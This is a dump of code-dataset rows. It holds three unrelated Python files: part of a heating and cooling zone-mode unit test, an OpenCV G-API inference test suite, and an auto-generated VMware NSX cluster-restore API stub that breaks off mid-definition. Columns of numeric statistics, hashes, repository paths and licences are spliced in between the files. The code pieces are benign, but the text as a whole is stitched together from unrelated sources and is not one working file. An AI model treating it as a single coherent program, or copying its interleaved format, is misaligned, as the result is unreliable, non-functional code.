self.assertEqual(OperatingModes.AUTO, active_mode.current)
self.assertEqual(SettingModes.ON, active_mode.sub)
def test_cooling_active_mode_auto_off(self) -> None:
cooling = ZoneCooling()
cooling.operating_mode = OperatingModes.AUTO
cooling.time_program = _time_program(mode=SettingModes.OFF)
active_mode = cooling.active_mode
self.assertEqual(OperatingModes.AUTO, active_mode.current)
self.assertEqual(SettingModes.OFF, active_mode.sub)
def test_cooling_active_mode_on(self) -> None:
cooling = ZoneCooling()
cooling.operating_mode = OperatingModes.ON
cooling.time_program = _time_program()
active_mode = cooling.active_mode
self.assertEqual(OperatingModes.ON, active_mode.current)
self.assertIsNone(active_mode.sub)
def test_cooling_active_mode_off(self) -> None:
cooling = ZoneCooling()
cooling.operating_mode = OperatingModes.OFF
cooling.time_program = _time_program()
active_mode = cooling.active_mode
self.assertEqual(OperatingModes.OFF, active_mode.current)
self.assertIsNone(active_mode.sub)
def test_get_active_mode_cooling_auto(self) -> None:
zone = _zone_cooling()
active_mode = zone.active_mode
self.assertEqual(OperatingModes.AUTO, active_mode.current)
self.assertEqual(zone.cooling.target_high, active_mode.target)
self.assertEqual(SettingModes.ON, active_mode.sub)
def test_get_active_mode_standby_cooling(self) -> None:
zone = _zone_cooling()
zone.active_function = ActiveFunction.STANDBY
active_mode = zone.active_mode
self.assertEqual(OperatingModes.AUTO, active_mode.current)
self.assertEqual(zone.cooling.target_high, active_mode.target)
self.assertEqual(SettingModes.ON, active_mode.sub)
def test_get_active_mode_standby_heating(self) -> None:
zone = _zone()
zone.active_function = ActiveFunction.STANDBY
active_mode = zone.active_mode
self.assertEqual(OperatingModes.AUTO, active_mode.current)
self.assertEqual(zone.heating.target_high, active_mode.target)
self.assertEqual(SettingModes.DAY, active_mode.sub)
| 38.742268
| 94
| 0.720596
| 436
| 3,758
| 5.908257
| 0.098624
| 0.217391
| 0.054348
| 0.09705
| 0.885093
| 0.852096
| 0.846273
| 0.846273
| 0.734084
| 0.627329
| 0
| 0
| 0.196647
| 3,758
| 96
| 95
| 39.145833
| 0.853263
| 0
| 0
| 0.630137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.356164
| 1
| 0.136986
| false
| 0
| 0.041096
| 0
| 0.191781
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db048f57866c20de5d25e3ee58fbcd5c7eca1c55
| 13,628
|
py
|
Python
|
modules/gapi/misc/python/test/test_gapi_infer.py
|
jiangjiajun/opencv
|
1fb3133ec5bedfc2733dca44e2c92e6feb8092e5
|
[
"Apache-2.0"
] | 14
|
2017-11-08T08:19:33.000Z
|
2021-08-02T20:29:38.000Z
|
modules/gapi/misc/python/test/test_gapi_infer.py
|
jiangjiajun/opencv
|
1fb3133ec5bedfc2733dca44e2c92e6feb8092e5
|
[
"Apache-2.0"
] | 362
|
2017-06-05T02:34:37.000Z
|
2021-12-10T03:26:23.000Z
|
modules/gapi/misc/python/test/test_gapi_infer.py
|
jiangjiajun/opencv
|
1fb3133ec5bedfc2733dca44e2c92e6feb8092e5
|
[
"Apache-2.0"
] | 17
|
2017-06-07T02:11:50.000Z
|
2020-06-01T13:55:41.000Z
|
#!/usr/bin/env python
import numpy as np
import cv2 as cv
import os
from tests_common import NewOpenCVTests
class test_gapi_infer(NewOpenCVTests):
    """Accuracy tests for the G-API inference API.

    Each test runs a model through plain OpenCV DNN (Inference Engine
    backend, CPU target) as the reference, then through cv.gapi.infer*,
    and asserts that the outputs match exactly (L-inf norm == 0).
    """

    def _ie_cpu_available(self):
        # Tests return early (effectively skip) when the IE backend
        # does not offer a CPU target in this build/environment.
        targets = cv.dnn.getAvailableTargets(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE)
        return cv.dnn.DNN_TARGET_CPU in targets

    def _find_model(self, root_path):
        """Return (model_path, weights_path) for the OMZ IR model at *root_path*."""
        model_path = self.find_file(root_path + '.xml',
                                    [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
        weights_path = self.find_file(root_path + '.bin',
                                      [os.environ.get('OPENCV_DNN_TEST_DATA_PATH')])
        return model_path, weights_path

    def infer_reference_network(self, model_path, weights_path, img):
        """Run *img* through the model with cv.dnn and return all network outputs."""
        net = cv.dnn.readNetFromModelOptimizer(model_path, weights_path)
        net.setPreferableBackend(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE)
        net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
        blob = cv.dnn.blobFromImage(img)
        net.setInput(blob)
        return net.forward(net.getUnconnectedOutLayersNames())

    def make_roi(self, img, roi):
        """Crop an (x, y, w, h) *roi* out of *img*, keeping trailing channel dims."""
        return img[roi[1]:roi[1] + roi[3], roi[0]:roi[0] + roi[2], ...]

    def test_age_gender_infer(self):
        # NB: Check IE
        if not self._ie_cpu_available():
            return

        root_path = '/omz_intel_models/intel/age-gender-recognition-retail-0013/FP32/age-gender-recognition-retail-0013'
        model_path, weights_path = self._find_model(root_path)
        device_id = 'CPU'
        img_path = self.find_file('cv/face/david2.jpg', [os.environ.get('OPENCV_TEST_DATA_PATH')])
        # The age/gender network expects a 62x62 input.
        img = cv.resize(cv.imread(img_path), (62, 62))

        # OpenCV DNN reference
        dnn_age, dnn_gender = self.infer_reference_network(model_path, weights_path, img)

        # OpenCV G-API
        g_in = cv.GMat()
        inputs = cv.GInferInputs()
        inputs.setInput('data', g_in)
        outputs = cv.gapi.infer("net", inputs)
        age_g = outputs.at("age_conv3")
        gender_g = outputs.at("prob")
        comp = cv.GComputation(cv.GIn(g_in), cv.GOut(age_g, gender_g))
        pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
        gapi_age, gapi_gender = comp.apply(cv.gin(img),
                                           args=cv.compile_args(cv.gapi.networks(pp)))

        # Check
        self.assertEqual(0.0, cv.norm(dnn_gender, gapi_gender, cv.NORM_INF))
        self.assertEqual(0.0, cv.norm(dnn_age, gapi_age, cv.NORM_INF))

    def test_age_gender_infer_roi(self):
        # NB: Check IE
        if not self._ie_cpu_available():
            return

        root_path = '/omz_intel_models/intel/age-gender-recognition-retail-0013/FP32/age-gender-recognition-retail-0013'
        model_path, weights_path = self._find_model(root_path)
        device_id = 'CPU'
        img_path = self.find_file('cv/face/david2.jpg', [os.environ.get('OPENCV_TEST_DATA_PATH')])
        img = cv.imread(img_path)
        roi = (10, 10, 62, 62)

        # OpenCV DNN reference: infer only on the cropped ROI.
        dnn_age, dnn_gender = self.infer_reference_network(model_path,
                                                           weights_path,
                                                           self.make_roi(img, roi))

        # OpenCV G-API: the ROI is passed as a graph input instead.
        g_in = cv.GMat()
        g_roi = cv.GOpaqueT(cv.gapi.CV_RECT)
        inputs = cv.GInferInputs()
        inputs.setInput('data', g_in)
        outputs = cv.gapi.infer("net", g_roi, inputs)
        age_g = outputs.at("age_conv3")
        gender_g = outputs.at("prob")
        comp = cv.GComputation(cv.GIn(g_in, g_roi), cv.GOut(age_g, gender_g))
        pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
        gapi_age, gapi_gender = comp.apply(cv.gin(img, roi),
                                           args=cv.compile_args(cv.gapi.networks(pp)))

        # Check
        self.assertEqual(0.0, cv.norm(dnn_gender, gapi_gender, cv.NORM_INF))
        self.assertEqual(0.0, cv.norm(dnn_age, gapi_age, cv.NORM_INF))

    def test_age_gender_infer_roi_list(self):
        # NB: Check IE
        if not self._ie_cpu_available():
            return

        root_path = '/omz_intel_models/intel/age-gender-recognition-retail-0013/FP32/age-gender-recognition-retail-0013'
        model_path, weights_path = self._find_model(root_path)
        device_id = 'CPU'
        rois = [(10, 15, 62, 62), (23, 50, 62, 62), (14, 100, 62, 62), (80, 50, 62, 62)]
        img_path = self.find_file('cv/face/david2.jpg', [os.environ.get('OPENCV_TEST_DATA_PATH')])
        img = cv.imread(img_path)

        # OpenCV DNN reference: one inference per cropped ROI.
        dnn_age_list = []
        dnn_gender_list = []
        for roi in rois:
            age, gender = self.infer_reference_network(model_path,
                                                       weights_path,
                                                       self.make_roi(img, roi))
            dnn_age_list.append(age)
            dnn_gender_list.append(gender)

        # OpenCV G-API: a GArray of ROIs produces per-ROI output lists.
        g_in = cv.GMat()
        g_rois = cv.GArrayT(cv.gapi.CV_RECT)
        inputs = cv.GInferInputs()
        inputs.setInput('data', g_in)
        outputs = cv.gapi.infer("net", g_rois, inputs)
        age_g = outputs.at("age_conv3")
        gender_g = outputs.at("prob")
        comp = cv.GComputation(cv.GIn(g_in, g_rois), cv.GOut(age_g, gender_g))
        pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
        gapi_age_list, gapi_gender_list = comp.apply(cv.gin(img, rois),
                                                     args=cv.compile_args(cv.gapi.networks(pp)))

        # Check
        for gapi_age, gapi_gender, dnn_age, dnn_gender in zip(gapi_age_list,
                                                              gapi_gender_list,
                                                              dnn_age_list,
                                                              dnn_gender_list):
            self.assertEqual(0.0, cv.norm(dnn_gender, gapi_gender, cv.NORM_INF))
            self.assertEqual(0.0, cv.norm(dnn_age, gapi_age, cv.NORM_INF))

    def test_age_gender_infer2_roi(self):
        # NB: Check IE
        if not self._ie_cpu_available():
            return

        root_path = '/omz_intel_models/intel/age-gender-recognition-retail-0013/FP32/age-gender-recognition-retail-0013'
        model_path, weights_path = self._find_model(root_path)
        device_id = 'CPU'
        rois = [(10, 15, 62, 62), (23, 50, 62, 62), (14, 100, 62, 62), (80, 50, 62, 62)]
        img_path = self.find_file('cv/face/david2.jpg', [os.environ.get('OPENCV_TEST_DATA_PATH')])
        img = cv.imread(img_path)

        # OpenCV DNN reference: one inference per cropped ROI.
        dnn_age_list = []
        dnn_gender_list = []
        for roi in rois:
            age, gender = self.infer_reference_network(model_path,
                                                       weights_path,
                                                       self.make_roi(img, roi))
            dnn_age_list.append(age)
            dnn_gender_list.append(gender)

        # OpenCV G-API: infer2 binds the ROI list to the input name directly.
        g_in = cv.GMat()
        g_rois = cv.GArrayT(cv.gapi.CV_RECT)
        inputs = cv.GInferListInputs()
        inputs.setInput('data', g_rois)
        outputs = cv.gapi.infer2("net", g_in, inputs)
        age_g = outputs.at("age_conv3")
        gender_g = outputs.at("prob")
        comp = cv.GComputation(cv.GIn(g_in, g_rois), cv.GOut(age_g, gender_g))
        pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
        gapi_age_list, gapi_gender_list = comp.apply(cv.gin(img, rois),
                                                     args=cv.compile_args(cv.gapi.networks(pp)))

        # Check
        for gapi_age, gapi_gender, dnn_age, dnn_gender in zip(gapi_age_list,
                                                              gapi_gender_list,
                                                              dnn_age_list,
                                                              dnn_gender_list):
            self.assertEqual(0.0, cv.norm(dnn_gender, gapi_gender, cv.NORM_INF))
            self.assertEqual(0.0, cv.norm(dnn_age, gapi_age, cv.NORM_INF))

    def test_person_detection_retail_0013(self):
        # NOTE(review): this test was defined twice in the original file; the
        # first copy contained a stray two-output `comp.apply` unpacking a
        # single-output graph and was silently shadowed by the second.  The
        # two copies are merged into this single, correct definition.
        # NB: Check IE
        if not self._ie_cpu_available():
            return

        root_path = '/omz_intel_models/intel/person-detection-retail-0013/FP32/person-detection-retail-0013'
        model_path, weights_path = self._find_model(root_path)
        img_path = self.find_file('gpu/lbpcascade/er.png', [os.environ.get('OPENCV_TEST_DATA_PATH')])
        device_id = 'CPU'
        # The detector expects a 544x320 input.
        img = cv.resize(cv.imread(img_path), (544, 320))

        # OpenCV DNN reference
        net = cv.dnn.readNetFromModelOptimizer(model_path, weights_path)
        net.setPreferableBackend(cv.dnn.DNN_BACKEND_INFERENCE_ENGINE)
        net.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)
        blob = cv.dnn.blobFromImage(img)

        def parseSSD(detections, size):
            """Convert raw SSD rows to (x, y, w, h) boxes with confidence >= 0.5."""
            h, w = size
            bboxes = []
            detections = detections.reshape(-1, 7)
            for _sample_id, _class_id, confidence, xmin, ymin, xmax, ymax in detections:
                if confidence >= 0.5:
                    x = int(xmin * w)
                    y = int(ymin * h)
                    width = int(xmax * w - x)
                    height = int(ymax * h - y)
                    bboxes.append((x, y, width, height))
            return bboxes

        net.setInput(blob)
        dnn_detections = net.forward()
        dnn_boxes = parseSSD(np.array(dnn_detections), img.shape[:2])

        # OpenCV G-API: same parse done in-graph by cv.gapi.parseSSD.
        g_in = cv.GMat()
        inputs = cv.GInferInputs()
        inputs.setInput('data', g_in)
        g_sz = cv.gapi.streaming.size(g_in)
        outputs = cv.gapi.infer("net", inputs)
        detections = outputs.at("detection_out")
        bboxes = cv.gapi.parseSSD(detections, g_sz, 0.5, False, False)
        comp = cv.GComputation(cv.GIn(g_in), cv.GOut(bboxes))
        pp = cv.gapi.ie.params("net", model_path, weights_path, device_id)
        gapi_boxes = comp.apply(cv.gin(img.astype(np.float32)),
                                args=cv.compile_args(cv.gapi.networks(pp)))

        # Comparison
        self.assertEqual(0.0, cv.norm(np.array(dnn_boxes).flatten(),
                                      np.array(gapi_boxes).flatten(),
                                      cv.NORM_INF))
# Standard OpenCV Python test-suite entry point.
if __name__ == '__main__':
NewOpenCVTests.bootstrap()
| 42.322981
| 123
| 0.580276
| 1,780
| 13,628
| 4.197191
| 0.091011
| 0.020078
| 0.040155
| 0.038549
| 0.946326
| 0.940035
| 0.940035
| 0.937224
| 0.934547
| 0.934547
| 0
| 0.022343
| 0.300484
| 13,628
| 321
| 124
| 42.454829
| 0.761355
| 0.021133
| 0
| 0.870968
| 0
| 0.02765
| 0.098836
| 0.077507
| 0
| 0
| 0
| 0
| 0.046083
| 1
| 0.046083
| false
| 0
| 0.018433
| 0.004608
| 0.115207
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db17f6bf7a9d7a02d5ab7761b5094fe666d599c5
| 22,293
|
py
|
Python
|
com/vmware/nsx/cluster/restore_client.py
|
vishal-12/vsphere-automation-sdk-python
|
9cf363971db77ea5a12928eecd5cf5170a7fcd8a
|
[
"MIT"
] | null | null | null |
com/vmware/nsx/cluster/restore_client.py
|
vishal-12/vsphere-automation-sdk-python
|
9cf363971db77ea5a12928eecd5cf5170a7fcd8a
|
[
"MIT"
] | null | null | null |
com/vmware/nsx/cluster/restore_client.py
|
vishal-12/vsphere-automation-sdk-python
|
9cf363971db77ea5a12928eecd5cf5170a7fcd8a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2019 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx.cluster.restore.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class Backuptimestamps(VapiInterface):
"""
Service for listing the timestamps of cluster backup files available on
the configured SFTP server.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.cluster.restore.backuptimestamps'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _BackuptimestampsStub)
def get(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns timestamps for all backup files that are available on the SFTP
server.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ClusterBackupInfoListResult`
:return: com.vmware.nsx.model.ClusterBackupInfoListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
# Dispatch through the generated stub; pagination/sort args pass straight through.
return self._invoke('get',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class Config(VapiInterface):
"""
Service for reading and updating the restore configuration, i.e. the
file server holding the backed-up files (secret fields are never
returned on read).
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.cluster.restore.config'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ConfigStub)
def get(self):
"""
Get configuration information for the file server used to store
backed-up files. Fields that contain secrets (password, passphrase) are
not returned.
:rtype: :class:`com.vmware.nsx.model_client.RestoreConfiguration`
:return: com.vmware.nsx.model.RestoreConfiguration
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get', None)
def update(self,
restore_configuration,
):
"""
Configure file server where the backed-up files used for the Restore
operation are available.
:type restore_configuration: :class:`com.vmware.nsx.model_client.RestoreConfiguration`
:param restore_configuration: (required)
:rtype: :class:`com.vmware.nsx.model_client.RestoreConfiguration`
:return: com.vmware.nsx.model.RestoreConfiguration
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'restore_configuration': restore_configuration,
})
class InstructionResources(VapiInterface):
"""
Service exposing the information to be conveyed to users for restore
steps that require user input (e.g. accepting/rejecting an action).
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.cluster.restore.instruction_resources'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _InstructionResourcesStub)
def get(self,
instruction_id,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
For restore operations requiring user input e.g. performing an action,
accepting/rejecting an action, etc. the information to be conveyed to
users is provided in this call.
:type instruction_id: :class:`str`
:param instruction_id: Id of the instruction set whose instructions are to be returned
(required)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ActionableResourceListResult`
:return: com.vmware.nsx.model.ActionableResourceListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'instruction_id': instruction_id,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class Status(VapiInterface):
"""
Service for querying the status of an NSX cluster restore request.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.cluster.restore.status'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _StatusStub)
def get(self):
"""
Returns status information for the specified NSX cluster restore
request.
:rtype: :class:`com.vmware.nsx.model_client.ClusterRestoreStatus`
:return: com.vmware.nsx.model.ClusterRestoreStatus
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get', None)
class _BackuptimestampsStub(ApiInterfaceStub):
# Auto-generated REST stub binding for the backuptimestamps service:
# declares input/output types, error mapping, and the REST metadata
# (GET /api/v1/cluster/restore/backuptimestamps).
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster/restore/backuptimestamps',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ClusterBackupInfoListResult'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.cluster.restore.backuptimestamps',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _ConfigStub(ApiInterfaceStub):
# Auto-generated REST stub binding for the config service:
# GET and PUT on /api/v1/cluster/restore/config.
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster/restore/config',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'restore_configuration': type.ReferenceType('com.vmware.nsx.model_client', 'RestoreConfiguration'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/cluster/restore/config',
request_body_parameter='restore_configuration',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'RestoreConfiguration'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'RestoreConfiguration'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.cluster.restore.config',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _InstructionResourcesStub(ApiInterfaceStub):
# Auto-generated REST stub binding for the instruction_resources service:
# GET /api/v1/cluster/restore/instruction-resources.
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'instruction_id': type.StringType(),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster/restore/instruction-resources',
path_variables={
},
query_parameters={
'instruction_id': 'instruction_id',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ActionableResourceListResult'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.cluster.restore.instruction_resources',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _StatusStub(ApiInterfaceStub):
# Auto-generated REST stub binding for the status service:
# GET /api/v1/cluster/restore/status.
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
